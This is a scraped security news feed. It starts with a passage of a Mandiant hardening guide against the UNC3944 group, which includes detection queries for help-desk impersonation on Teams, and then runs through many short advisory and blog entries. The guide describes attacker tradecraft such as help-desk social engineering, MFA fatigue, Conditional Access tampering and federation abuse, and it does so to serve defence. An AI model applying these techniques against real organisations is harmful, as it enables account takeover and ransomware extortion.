UNC3944 or the DragonForce RaaS, over the past few years, retail organizations have been increasingly posted on tracked data leak sites (DLS) used by extortion actors to pressure victims and/or leak stolen victim data. Retail organizations accounted for 11 percent of DLS victims in 2025 thus far, up from about 8.5 percent in 2024 and 6 percent in 2022 and 2023. It is plausible that threat actors including UNC3944 view retail organizations as attractive targets, given that they typically possess large quantities of personally identifiable information (PII) and financial data. Further, these companies may be more likely to pay a ransom demand if a ransomware attack impacts their ability to process financial transactions. UNC3944 global targeting map We have observed the following patterns in UNC3944 victimology: Targeted Sectors: The group targets a wide range of sectors, with a notable focus on Technology, Telecommunications, Financial Services, Business Process Outsourcing (BPO), Gaming, Hospitality, Retail, and Media & Entertainment organizations. Geographical Focus: Targets are primarily located in English-speaking countries, including the United States, Canada, the United Kingdom, and Australia. More recent campaigns have also included targets in Singapore and India. Victim Organization Size: UNC3944 often targets large enterprise organizations, likely due to the potential for higher impact and ransom demands. They specifically target organizations with large help desk and outsourced IT functions which are susceptible to their social engineering tactics. A high-level overview of UNC3944 tactics, techniques and procedures (TTPs) are noted in the following figure. UNC3944 attack lifecycle Proactive Hardening Recommendations The following provides prioritized recommendations to protect against tactics utilized by UNC3944, organized within the pillars of: Identity Endpoints Applications and Resources Network Infrastructure Monitoring / Detections While implementing the full suite of the recommendations in this guide will generally have some impact on IT and normal operations, Mandiant’s extensive experience supporting organizations to defend against, contain, and eradicate UNC3944 has shown that an effective starting point involves prioritizing specific areas. Organizations should begin by focusing on recommendations that:  Achieve complete visibility across all infrastructure, identity, and critical management services. Ensure the segregation of identities throughout the infrastructure. Enhance strong authentication criteria. Enforce rigorous identity controls for password resets and multi-factor authentication (MFA) registration. Educate and communicate the importance of remaining vigilant against modern-day social engineering attacks / campaigns (see Social Engineering Awareness section later in this post). UNC3944 campaigns not only target end-users, but also IT and administrative personnel within enterprise environments. These serve as critical foundational measures upon which other recommendations in this guide can be built. Google SecOps customers benefit from existing protections that actively detect and alert on UNC3944 activity. Identity Positive Identify Verification UNC3944 has proven to be very prolific in using social engineering techniques to impersonate users when contacting the help desk. Therefore, further securing the “positive identity” process is critical.  Train help desk personnel to positively identify employees before modifying / providing security information (including initial enrollment). At a minimum, this process should be required for any privileged accounts and should include methods such as: On-Camera / In-Person verification ID Verification Challenge / Response questions If a suspected compromise is imminent or has occurred, temporarily disable or enhance validation for self-service password reset methods. Any account management activities should require a positive identity verification as the first step. Additionally, employees should be required to authenticate using strong authentication PRIOR to changing authentication methods (e.g., adding a new MFA device). Additionally, implement use of: Trusted Locations Notification of authentication / security changes  Out-of-band verification for high-risk changes. For example, require a call-back to a registered number or confirmation via a known corporate email before proceeding with any sensitive request. Avoid reliance on publicly available personal data for verification (e.g., DOB, last 4 SSN) as UNC3944 often possesses this information. Use internal-only knowledge or real-time presence verification when possible. Temporarily disable self-service MFA resets during elevated threat periods, and route all such changes through manual help desk workflows with enhanced scrutiny. Strong Authentication To prevent against social engineering or other methods used to bypass authentication controls: Remove SMS, phone call, and/or email as authentication controls. Utilize an authenticator app that requires phishing resistant MFA (e.g., number matching and/or geo-verification). If possible, transition to passwordless authentication. Leverage FIDO2 security keys for authenticating identities that are assigned privileged roles. Ensure administrative users cannot register or use legacy MFA methods, even if those are permitted for lower-tier users.  Enforce multi-context criteria to enrich the authentication transaction. Examples include not only validating the identity, but also specific device and location attributes as part of the authentication transaction. For organizations that leverage Google Workspace, these concepts can be enforced by using context-aware access policies. For organizations that leverage Microsoft Entra ID, these concepts can be enforced by using a Conditional Access Policy. MFA Registration and Modification To prevent compromised credentials from being leveraged for modifying and registering an attacker-controlled MFA method: Review authentication methods available for user registration and disallow any unnecessary or duplicative methods.  Restrict MFA registration and modification actions to only be permissible from trusted IP locations and based upon device compliance. For organizations that leverage Microsoft Entra ID, this can be accomplished using a Conditional Access Policy. If a suspected compromise has occurred, MFA re-registration may be required. This action should only be permissible from corporate locations and/or trusted IP locations. Review specific IP locations that can bypass the requirement for MFA. If using Microsoft Entra ID, these can be in Named Locations and the legacy Service Settings. Investigate and alert when the same MFA method or phone number is registered across multiple user accounts, which may indicate attacker-controlled device registration. Administrative Roles To prevent against privilege escalation and further access to an environment: For privileged access, decouple the organization's identity store (e.g., Active Directory) from infrastructure platforms, services, and cloud admin consoles. Organizations should create local administrator accounts (e.g., local VMware VCenter Admin account). Local administrator accounts should adhere to the following principles:  Created with long and complex passwords  Passwords should not be temporarily stored within the organization’s password management or vault solution  Enforcement of Multi-Factor Authentication (MFA) Restrict administrative portals to only be accessible from trusted locations and with privileged identities. Leverage just-in-time controls for leveraging (“checking out”) credentials associated with privileged actions.  Enforce access restrictions and boundaries that follow the principle of least-privilege for accessing and administering cloud resources. For organizations that leverage Google Cloud, these concepts can be enforced by using IAM deny or principle access boundary policies.  For organizations that leverage Microsoft Entra ID, these concepts can be enforced by using Azure RBAC and Entra ID RBAC controls.  Enforce that privileged accounts are hardened to prevent exposure or usage on non-Tier 0 or non-PAW endpoints.  Playbooks Modern-day authentication is predicated on more than just a singular password. Therefore, organizations should ensure that processes and associated playbooks include steps to: Revoke tokens and access keys. Review MFA device registrations. Review changes to authentication requirements. Review newly enrolled devices and endpoints. Endpoints Device Compliance and Validation An authentication transaction should not only include strong requirements for identity verification, but also require that the device be authenticated and validated. Organizations should consider the ability to: Enforce posture checks for devices remotely connecting to an environment (e.g., via a VPN). Example posture checks for devices include:  Validating the installation of a required host-based certificate on each endpoint. Verifying that the endpoint operates on an approved Operating System (OS) and meets version requirements. Confirming the organization's Endpoint Detection and Response (EDR) agent is installed and actively running. Enforce EDR installation and monitoring for all managed endpoint devices. Rogue / Unauthorized Endpoints To prevent against threat actors leveraging rogue endpoints to access an environment, organizations should: Monitor for rogue bastion hosts or virtual machines that are either newly created or recently joined to a managed domain. Harden policies to restrict the ability to join devices to Entra or on-premises Active Directory. Review authentication logs for devices that contain default Windows host names. Lateral Movement Hardening To prevent against lateral movement using compromised credentials, organizations should: Limit the ability for local accounts to be used for remote (network-based) authentication. Disable or restrict local administrative and/or hidden shares from being remotely accessible. Enforce local firewall rules to block inbound SMB, RDP, WinRM, PowerShell, & WMI. GPOs: User Rights Assignment Lockdown (Active Directory) For domain-based privileged and service accounts, where possible, organizations should restrict the ability for accounts to be leveraged for remote authentication to endpoints. This can be accomplished using a Group Policy Object (GPO) configuration for the following user rights assignments: Deny log on locally  Deny log on through Remote Desktop Services Deny access to this computer from network  Deny log on as a batch Deny log on as a service Applications and Resources Virtual Private Network (VPN) Access Threat actors may attempt to change or disable VPN agents to limit network visibility by security teams. Therefore, organizations should: Disable the ability for end users to modify VPN agent configurations. Ensure appropriate logging when configuration changes are made to VPN agents. For managed devices, consider an “Always-On” VPN configuration to ensure continuous protection. Privileged Access Management (PAM) Systems To prevent against threat actors attempting to gain access to privileged access management (PAM) systems, organizations should: Isolate and enforce network and identity access restrictions for enterprise password managers or privileged access management (PAM) systems. This should also include leveraging dedicated and segmented servers / appliances for PAM systems, which are isolated from enterprise infrastructure and virtualization platforms. Reduce the scope of accounts that have access to PAM systems, in addition to requiring strong authentication (MFA). Enforce role-based access controls (RBAC) within PAM systems, restricting the scope of accounts that can be accessed (based upon an assigned role). Follow the principle of just-in-time (JIT) access for checking-out credentials stored in PAM systems.  Virtualization Infrastructure To prevent against threat actors attempting to gain access to virtualization infrastructure, organizations should: Isolate and restrict access to ESXi hosts / vCenter Server Appliances. Ensure that backups of virtual machines are isolated, secured and immutable if possible. Unbind the authentication for administrative access to virtualization platforms from the centralized identity provider (IdP). This includes individual ESXi hosts and vCenter Servers. Proactively rotate local root / administrative passwords for privileged identities associated with virtualization platforms. If possible use stronger MFA and bind to local SSO for all administrative access to virtualization infrastructure. Enforce randomized passwords for local root / administrative identities correlating to each virtualized host that is part of an aggregate pool. Disable / restrict SSH (shell) access to virtualization platforms. Enable lockdown mode on all ESXi hosts. Enhance monitoring to identify potential malicious / suspicious authentication attempts and activities associated with virtualization platforms. Backup Infrastructure To prevent against threat actors attempting to gain access to backup infrastructure and data, organizations should: Leverage unique and separate (non-identity provider integrated) credentials for accessing and managing backup infrastructure, in addition to the enforcement of MFA for the accounts. Ensure that backup servers are isolated from the production environment and reside within a dedicated network. To further protect backups, they should be within an immutable backup solution. Implement access controls that restrict inbound traffic and protocols for accessing administrative interfaces associated with backup infrastructure.  Periodically validate the protection and integrity of backups by simulating adversarial behaviors (red teaming). Endpoint Security Management  To prevent against threat actors weaponizing endpoint security and management technologies such as EDR and patch management tools, organizations should:  Segment administrative access to endpoint security tooling platforms. Reduce the scope of identities that have the ability to create, edit, or delete Group Policy Objects (GPOs) in on-premises Active Directory. If Intune is leveraged, enforce Intune access policies that require multi-administrator approval (MMA) to approve and enforce changes.  Monitor and review unauthorized access to EDR and patch management technologies.  Monitor script and application deployment on endpoints and systems using EDR and patch management technologies. Review and monitor “allow-listed” executables, processes, paths, and applications. Inventory installed applications on endpoints and review for potential unauthorized installations of remote access (RATs) and reconnaissance tools. Cloud Resources To prevent against threat actors leveraging access to cloud infrastructure for additional persistence and access, organizations should: Monitor and review cloud resource configurations to identify and investigate newly created resources, exposed services, or other unauthorized configurations.  Monitor cloud infrastructure for newly created or modified network security group (NSG) rules, firewall rules, or publicly exposed resources that can be remotely accessed. Monitor for the creation of programmatic keys and credentials (e.g., access keys). Network Infrastructure Access Restrictions To proactively identify exposed applications, ingress pathways, and to reduce the risk of unauthorized access, organizations should: Leverage vulnerability scanning to perform an external unauthenticated scan to identify publicly exposed domains, IPs, and CIDR IP ranges. Enforce strong authentication (e.g., phishing-resistant MFA) for accessing any applications and services that are publicly accessible.  For sensitive data and applications, enforce connectivity to cloud environments / SaaS applications to only be permissible from specific (trusted) IP ranges. Block TOR exit node and VPS IP ranges. Network Segmentation The terminology of “Trusted Service Infrastructure” (TSI) is typically associated with management interfaces for platforms and technologies that provide core services for an organization. Examples include: Asset and Patch Management Tools Network Management Tools and Devices Virtualization Platforms Backup Technologies Security Tooling Privileged Access Management Systems To minimize the direct access and exposure of the management plane for TSI, organizations should: Restrict access to TSI to only originate from internal / hardened network segments or PAWs. Create detections focused on monitoring network traffic patterns for directly accessing TSI, and alert on anomalies or suspicious traffic. Egress Restrictions To restrict the ability for command-and-control and reduce the capabilities for mass data exfiltration, organizations should: Restrict egress communications from all servers. Organizations should prioritize enforcing egress restrictions from servers associated with TSI, Active Directory domain controllers, and crown jewel application and data servers. Block outbound traffic to malicious domain names, IP addresses, and domain names/addresses associated with remote access tools (RATs). Monitoring / Detections Reconnaissance Upon initial compromise, UNC3944 is known to search for documentation on topics such as: user provisioning, MFA and/or device registration, network diagrams, and shared credentials in documents or spreadsheets. UNC3944 will also use network reconnaissance tools like ADRecon, ADExplorer, and SharpHound. Therefore, organizations should: Ensure any sites or portals that include these documents have access restrictions to only required accounts. Sweep for documents and spreadsheets that may contain shared credentials and remove them. Implement alerting rules on endpoints with EDR agents for possible execution of known reconnaissance tools. If utilizing an Identity monitoring solution, ensure detection rules are enabled and alerts are created for any reconnaissance and discovery detections. Implement an automated mechanism to continuously monitor domain registrations. Identify domains that mimic the organization's naming conventions, for instance: [YourOrganizationName]-helpdesk.com or [YourOrganizationName]-SSO.com. MFA Registration To further harden the MFA registration process, organizations should: Review logs to specifically identify events related to the registration or addition of new MFA devices or methods to include actions similar to: MFA device registered Authenticator app added Phone number added for MFA The same MFA device / method / phone number being associated with multiple users Verify the legitimacy of new registrations against expected user behavior and any onboarding or device enrollment records. Contact users if new registrations are detected to confirm if the activity is intentional. Collaboration and Communication Platforms To prevent against social engineering and/or unauthorized access or modifications to communication platforms, organizations should: Review organizational policies around communication tools such as Microsoft Teams.  Allow only trusted external domains for expected vendors and partners. If external domains cannot be blocked, create a baseline of trusted domains and alert on new domains that attempt to contact employees. Provide awareness training to employees and staff to directly contact the organization’s helpdesk if they receive suspicious calls or messages. The following is a Microsoft Defender advanced hunting query example. The query is written to detect when an external account (attempting to impersonate the help desk) attempts to contact the organization’s users. Note: The DisplayName field can be modified to include other relevant fields specific to the organization (such as “IT Support” or “ServiceDesk”). CloudAppEvents | where Application == "Microsoft Teams" | where ActionType == "ChatCreated" | extend HasForeignTenantUsers = parse_json(RawEventData)["ParticipantInfo"]["HasForeignTenantUsers"] | extend DisplayName = parse_json(RawEventData)["Members"][0]["DisplayName"] | where IsExternalUser == 1 or HasForeignTenantUsers == 'true' | where DisplayName contains "help" or AccountDisplayName contains "help" or AccountId contains "help" The following is a Google SecOps search query example. Note: The DisplayName field can be modified to include other relevant fields specific to the organization (such as “IT Support” or “ServiceDesk”). metadata.vendor_name = "Microsoft" metadata.product_name = "Office 365" metadata.product_event_type = "ChatCreated" security_result.detection_fields["ParticipantInfo_HasForeignTenantUsers"] = "true" ( principal.user.userid = /help/ OR principal.user.email_addresses = /help/ OR about.user.user_display_name = /help/ ) Identity Session Risk & Visibility Detections should include: Authentication from infrequent locations - including from proxy and VPN service providers. Attempts made to change authentication methods or criteria. Monitoring and hunting for authentication anomalies based upon social engineering tactics. Bypassing Multi-Factor Authentication UNC3944 has been known to modify requirements for the use of Multi-factor Authentication. Therefore, organizations should: For Entra ID, monitor for modifications to any Trusted Named Locations that may be used to bypass the requirement for MFA. For Entra ID, monitor for changes to Conditional Access Policies that enforce MFA, specifically focusing on exclusions of compromised user accounts and/or devices for an associated policy. Ensure the SOC has visibility into token replay or suspicious device logins, aligning workflows that can trigger step-up (re)authentication when suspicious activity is detected. Abuse of Domain Federation For organizations that are using Microsoft Entra ID, monitor for possible abuse of Entra ID Identity Federation: Check domain names that are registered in the Entra ID tenant, paying particular attention to domains that are marked as Federated. Review the Federation configuration of these domains to ensure that they are correct. Monitor for creation of any new domains within the tenant and for changing the authentication method to be Federated. Abuse of Domain Federation requires the account accomplishing the changes to have administrative permissions in Entra ID. Hardening of all administrative accounts, portals, and programmatic access is imperative. Social Engineering Awareness UNC3944 is extremely proficient at using multiple forms of social engineering to convince users into doing something that will allow them to gain access. Organizations should educate users to be aware of and notify internal security teams of attempts that utilize the following tactics: SMS phishing messages that claim to be from IT requesting users to download and install software on their machine. These may include claims that the user’s machine is out-of-compliance or is failing to report to internal management systems. SMS messages or emails with links to sites that reference domain names that appear legitimate and reference SSO (single sign-on) and a variation of the company name. Messages may include text informing the user that they need to reset their password and/or MFA. Phone calls to users from IT with requests to reset a password and/or MFA - or requesting that the user provide a validated one time passcode (OTP) from their device.  SMS messages or emails with requests to be granted access to a particular system, particularly if the organization already has an established method for provisioning access. MFA fatigue attacks, where attackers may repeatedly send MFA push notifications to a victim’s device until the user unintentionally or out of frustration accepts one. Organizations should train users to reject unexpected MFA prompts and report such activity immediately. Impersonation via collaboration tools - UNC3944 has used platforms like Microsoft Teams to pose as internal IT support or service desk personnel. Organizations should train users to verify unusual chat messages and avoid sharing credentials or MFA codes over internal collaboration tools like Microsoft Teams. Limiting external domains and monitoring for impersonation attempts (e.g., usernames containing ‘helpdesk’ or ‘support’) is advised. In rare cases, attackers have used doxxing threats or aggressive language to scare users into compliance. Ensure employees understand this tactic and know that the organization will support them if they report these incidents. Additional References Ransomware Protection and Containment Strategies: Practical Guidance for Hardening and Protecting Infrastructure, Identities and Endpoints UNC3944 Targets SaaS Applications Why Are You Texting Me? UNC3944 Leverages SMS Phishing Campaigns for SIM Swapping, Ransomware, Extortion, and Notoriety

https://cloud.google.com/blog/topics/threat-intelligence/unc3944-proactive-hardening-recommendations/
RiskRecon: Empowering Federal Agencies with Automated, Continuous Supplier Risk Management
2025-05-06T14:00:00Z | 1746540000

As federal agencies navigate an increasingly complex digital supply chain, ensuring continuous oversight of supplier cybersecurity has never been more critical—or more challenging. Limited staff resources, evolving compliance mandates, and risk propagation through fourth-party (and beyond) connections demand a smarter, more scalable approach to third-party risk management.

https://blog.riskrecon.com/riskrecon-empowering-federal-agencies-with-automated-continuous-supplier-risk-management
The Invisible Threats You’re Not Seeing—and Why That Matters
2025-05-06T13:30:00Z | 1746538200

Cybersecurity isn’t a game of cat and mouse. It’s a game of chess—one where the opponent is always thinking five moves ahead. Every organization wants to believe it has a strong defense, but attackers know better. They exploit blind spots, hide in encrypted traffic, and move undetected through networks. The problem isn...

https://www.netscout.com/blog/invisible-threats-youre-not-seeing-and-why-matters
InterSECt — The Fast Lane to a Secure Future Starts Here
2025-05-06T13:00:22Z | 1746536422

InterSECt is a 2-hour virtual event unveiling the network security future with industry leaders, Palo Alto Networks advancements and product demos. The post InterSECt — The Fast Lane to a Secure Future Starts Here appeared first on Palo Alto Networks Blog.

https://www.paloaltonetworks.com/blog/2025/05/intersect-fast-lane-secure-future-starts-here/
Here Comes Mirai: IoT Devices RSVP to Active Exploitation
2025-05-06T13:00:00Z | 1746536400

https://www.akamai.com/blog/security-research/2025/may/active-exploitation-mirai-geovision-iot-botnet
Are You Using CNAPP to Its Full Potential, or Just Paying for It?
2025-05-06T13:00:00Z | 1746536400

Over the last few years, CNAPP (Cloud-Native Application Protection Platform) has captured the attention of security leaders by promising a […]

https://www.guidepointsecurity.com/blog/are-you-using-cnapp-to-its-full-potential-or-just-paying-for-it/
Save the Date: International EU Funding and Matchmaking Event in Helsinki – 27 August 2025
2025-05-06T12:38:19Z | 1746535099

Looking for new partners for EU projects or keen to learn about current cybersecurity funding opportunities? Save the date: 27 August 2025 – a networking event in Helsinki focused on EU funding awaits you!

https://www.kyberturvallisuuskeskus.fi/en/news/save-date-international-eu-funding-and-matchmaking-event-helsinki-27-august-2025
Save the Date: International EU Funding and Matchmaking Event in Helsinki – 27 August 2025
2025-05-06T12:38:19Z | 1746535099

Looking for new partners for EU projects or keen to learn about current cybersecurity funding opportunities? Save the date: 27 August 2025 – a networking event in Helsinki focused on EU funding awaits you!

https://www.kyberturvallisuuskeskus.fi/en/news/save-date-international-eu-funding-and-matchmaking-event-helsinki-27-august-2025
A New Way to Partner: Inside the Cato Networks Channel First Partner Program
2025-05-06T12:26:00Z | 1746534360

The market is evolving, and partners need more than a one-size-fits-all partner program to stay competitive.   That’s why I’m excited to share that today we’re introducing the Cato Networks Channel First Partner Program—a purpose-built framework that aligns with how you go-to-market. This modular program, with specialization tracks for every partner type—Resellers, Managed Service Providers (MSPs),... The post A New Way to Partner: Inside the Cato Networks Channel First Partner Program  appeared first on Cato Networks.

https://www.catonetworks.com/blog/inside-cato-channel-first-partner-program/
Lampion Is Back With ClickFix Lures
2025-05-06T10:00:59Z | 1746525659

Lampion malware distributors are now using the social engineering method ClickFix. Read our analysis of a recent campaign. The post Lampion Is Back With ClickFix Lures appeared first on Unit 42.

https://unit42.paloaltonetworks.com/lampion-malware-clickfix-lures/
Proactive threat hunting with Talos IR
2025-05-06T10:00:55Z | 1746525655

Learn more about the framework Talos IR uses to conduct proactive threat hunts, and how we can help you stay one step ahead of emerging threats.

https://blog.talosintelligence.com/proactive-threat-hunting-with-talos-ir/
Clavister launches RSG-200 – new defence product and secures initial customer order
2025-05-06T09:06:02Z | 1746522362

May 6, 2025 – Örnsköldsvik, Sweden – Clavister, a leading European provider of cybersecurity for mission-critical applications, today announces the launch of its new defence product, Clavister RSG-200 – a… Read more The post Clavister launches RSG-200 – new defence product and secures initial customer order appeared first on Clavister. About Clavister Clavister is a leading European cybersecurity vendor with over 20 years of experience. Seated in Sweden, the company has customers—communication service providers, governments, enterprises and managed security service providers (MSSPs)—in more than 150 countries. Clavister provides unique security solutions to protect their digital assets and secure business continuity. The stock, Clavister Holding AB, is listed at NASDAQ First North under short name CLAV.

https://www.clavister.com/clavister-launches-rsg-200-new-defence-product-and-secures-initial-customer-order/
UK critical systems at increased risk from 'digital divide' created by AI threats
2025-05-06T09:02:48Z | 1746522168

New report warns that organisations unable to defend AI-enabled threats are exposed to greater cyber risk.

https://www.ncsc.gov.uk/news/ai-to-2027-threat-assessment
Toll road scams are in overdrive: Here’s how to protect yourself
2025-05-06T09:00:00Z | 1746522000

Have you received a text message about an unpaid road toll? Make sure you’re not the next victim of a smishing scam.

https://www.welivesecurity.com/en/scams/put-brakes-toll-road-scams/
CVE-2025-4041
2025-05-06T09:00:00Z | 1746522000

CWE-798 USE OF HARD-CODED CREDENTIALS: In Optigo Networks ONS NC600 versions 4.2.1-084 through 4.7.2-330, an attacker could connect with the device's ssh server and utilize the system's components to perform OS command executions. Optigo Networks recommends users implement at least one of the following additional mitigations: Use a dedicated NIC on the BMS computer and exclusively use the computer for connecting to OneView to manage your OT network configuration. Set up a router firewall with a white list for the devices permitted to access OneView. Connect to OneView via secure VPN.

https://claroty.com/team82/disclosure-dashboard/cve-2025-4041
Pradeo Unveils Yagaan, Its New Platform Dedicated to Application Security
2025-05-06T07:00:00Z | 1746514800

Pradeo, a leader in mobile cybersecurity, is launching Yagaan, the next generation of its web and mobile application security suite. Developed by a dedicated team within the company, Yagaan stands out with a user-friendly and educational approach, breaking down traditional barriers to cybersecurity. Designed for all levels of expertise, the platform enables organizations to quickly secure their applications without complicating the production pipeline.

https://blog.pradeo.com/pradeo-unveils-yagaan-its-new-platform-dedicated-to-application-security
5 Ways FWaaS Empowers Modern Business
2025-05-06T06:49:46Z | 1746514186

The post 5 Ways FWaaS Empowers Modern Business appeared first on Cato Networks.

https://www.catonetworks.com/resources/5-ways-fwaas-empowers-modern-business/
ZDI-CAN-26480: Cisco
2025-05-06T05:00:00Z | 1746507600

A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Kentaro Kawane of GMO Cybersecurity by Ierae' was reported to the affected vendor on: 2025-05-06, 31 days ago. The vendor is given until 2025-09-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26479: Cisco
2025-05-06T05:00:00Z | 1746507600

A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Kentaro Kawane of GMO Cybersecurity by Ierae' was reported to the affected vendor on: 2025-05-06, 31 days ago. The vendor is given until 2025-09-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26851: Lorex
2025-05-06T05:00:00Z | 1746507600

A CVSS score 7.5 AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'PHP Hooligans / Midnight Blue' was reported to the affected vendor on: 2025-05-06, 31 days ago. The vendor is given until 2025-09-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26482: Cisco
2025-05-06T05:00:00Z | 1746507600

A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Kentaro Kawane of GMO Cybersecurity by Ierae' was reported to the affected vendor on: 2025-05-06, 31 days ago. The vendor is given until 2025-09-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26483: Cisco
2025-05-06T05:00:00Z | 1746507600

A CVSS score 9.8 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Kentaro Kawane of GMO Cybersecurity by Ierae' was reported to the affected vendor on: 2025-05-06, 31 days ago. The vendor is given until 2025-09-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26481: Cisco
2025-05-06T05:00:00Z | 1746507600

A CVSS score 9.8 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Kentaro Kawane of GMO Cybersecurity by Ierae' was reported to the affected vendor on: 2025-05-06, 31 days ago. The vendor is given until 2025-09-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
Why Most Email Security Setups Fall Short
2025-05-06T04:28:30Z | 1746505710

The post Why Most Email Security Setups Fall Short appeared first on Open Systems.

https://www.open-systems.com/blog/why-most-email-security-setups-fall-short/
Security Alert (A25-05-02): Multiple Vulnerabilities in Android
2025-05-06T04:00:00Z | 1746504000

Google has released Android Security Bulletin May 2025 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-05-03): Multiple Vulnerabilities in Microsoft Edge
2025-05-06T04:00:00Z | 1746504000

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
CNCS promove campanha de sensibilização Palavra-Passe Cibersegura
2025-05-06T00:00:00Z | 1746489600

O Centro Nacional de Cibersegurança (CNCS) e o Centro de Análise e Partilha de Informação - Retalho e Distribuição (ISAC) unem esforços para promover a campanha de sensibilização “Palavra-Passe Cibersegura”, associada à efeméride “Dia Mundial da Password”, comemorada na primeira quinta-feira de maio. Sob o mote “Palavra-passe forte, conta segura”, a campanha desenvolvida pelo CNCS, visa promover boas práticas de ciber-higiene quanto ao uso da palavra-passe, mitigando riscos associados ao desconhecimento e uso incorreto das boas práticas nesta matéria. À campanha, que iniciou a 29 de abril e termina a 13 de maio, também se associa a Associação Portuguesa de Empresas de Distribuição (APED). A ISAC Retalho e Distribuição, que integra a Auchan Portugal, a Jeronimo Martins, o Leroy Merlin, o Lidl Portugal e a Sonae MC, é uma das comunidades de cibersegurança setoriais dinamizada pelo CNCS, cujo objetivo é promover um ambiente de colaboração e assistência mútua com vista ao aumento da ciber-resiliência do setor do retalho e distribuição nacional. Através desta e outras Comunidades de Cibersegurança, o CNCS procura fomentar e desenvolver laços de confiança entre responsáveis e elementos operacionais de Cibersegurança de diversas entidades e organizações, abrindo canais de comunicação e de cooperação entre pares, para uma mais rápida resolução de problemas e partilha de conhecimento. Desta forma, através do trabalho colaborativo, todos contribuem para o reforço da capacitação organizacional e individual, assumindo a cibersegurança como uma responsabilidade partilhada.

https://dyn.cncs.gov.pt/pt/detalhe/art/135926/cncs-promove-campanha-de-sensibilizacao-palavra-passe-cibersegura
Bit ByBit - emulation of the DPRK's largest cryptocurrency heist
2025-05-06T00:00:00Z | 1746489600

A high-fidelity emulation of the DPRK's largest cryptocurrency heist via a compromised macOS developer and AWS pivots.

https://www.elastic.co/security-labs/bit-bybit
Identity-Centric Attacks: The New Reality for UK Retail by Caren Havelock
2025-05-06T00:00:00Z | 1746489600

Scattered Spider is behind recent UK retailer cyberattacks—learn how identity-based threats bypass MFA and exploit hybrid IT environments.

https://www.vectra.ai/blog/identity-centric-attacks-the-new-reality-for-uk-retail
Verizon DBIR 2025: Edge KEVs Are Increasingly Left Unpatched — and More Often Exploited in Breaches
2025-05-06T00:00:00Z | 1746489600

Edge vulnerabilities are a critical and growing threat. The 2025 DBIR reveals an eightfold surge in exploitation, yet many remain unpatched despite immediate risk.

https://www.greynoise.io/blog/verizon-dbir-2025-edge-kevs-increasingly-left-unpatched-exploited
The Power of Women in Cybersecurity: Mentorship, Community, and Rising Together
2025-05-05T22:30:00Z | 1746484200

Author: Brittany Huffman, Training Coordinator, GPSU, GuidePoint Security In the high-stakes world of cybersecurity—where threats are invisible but the impact […]

https://www.guidepointsecurity.com/blog/the-power-of-women-in-cybersecurity-mentorship-community-and-rising-together/
Securing Retail at Scale: Lessons from the Harrods Cyberattack
2025-05-05T20:59:19Z | 1746478759

Author:  Adam Boeckmann | May 2025 Recent attacks on major UK retailers, including Harrods, M&S, and Co-op, have highlighted a critical reality: even iconic brands with robust reputations are vulnerable to cyber threats. And unfortunately, reactive approaches to security are not enough to combat modern threats. But end-to-end network visibility and proactive threat detection are more effective ways for retail companies to bolster their defenses. What Happened... Read more » The post Securing Retail at Scale: Lessons from the Harrods Cyberattack appeared first on Plixer.

https://www.plixer.com/blog/harrods-cyberattack-lessons/
Welcome to Maintainer Month: Events, exclusive discounts, and a new security challenge
2025-05-05T17:30:54Z | 1746466254

This May marks the fifth annual Maintainer Month, and there are lots of treats in store: new badges, special discounts, events with experts, and more. The post Welcome to Maintainer Month: Events, exclusive discounts, and a new security challenge appeared first on The GitHub Blog.

https://github.blog/open-source/maintainers/welcome-to-maintainer-month-events-exclusive-discounts-and-a-new-security-challenge/
Improving Code Coverage: The Benefits of Exhaustive Static Analysis & Runtime Exploit Prevention
2025-05-05T16:10:33Z | 1746461433

This is a guest post by TrustInSoft. TrustInSoft develops solutions for advanced software analysis that specialize in formal verification of C, C++ and Rust source code to ensure safety, security and reliability.  Key Takeaways: High code coverage is crucial for minimizing vulnerabilities and improving software reliability. Combining exhaustive static analysis with runtime exploit prevention offers […] The post Improving Code Coverage: The Benefits of Exhaustive Static Analysis & Runtime Exploit Prevention appeared first on RunSafe Security.

https://runsafesecurity.com/blog/improving-code-coverage/
Network Security Checklist for Enterprises
2025-05-05T15:44:42Z | 1746459882

Protecting your network isn’t just a best practice, it’s a necessity. Cyber threats are getting more sophisticated by the day, and attackers aren’t slowing down. Whether it’s ransomware, insider threats,...

https://www.firemon.com/blog/network-security-checklist/
The State of Customer Experience 2025
2025-05-05T14:01:16Z | 1746453676

Download the only report you’ll need to uncover why CX leaders are thriving — and why other companies are falling behind. The post The State of Customer Experience 2025 appeared first on Verint.

https://www.verint.com/resources/the-state-of-customer-experience-2025/
Incidents impacting retailers – recommendations from the NCSC
2025-05-05T13:11:16Z | 1746450676

A joint blog post by the NCSC’s National Resilience Director, Jonathon Ellison, and Chief Technology Officer, Ollie Whitehouse.

https://www.ncsc.gov.uk/blog-post/incidents-impacting-retailers
The Ultimate Defense Against Multivector DDoS Attacks
2025-05-05T13:00:00Z | 1746450000

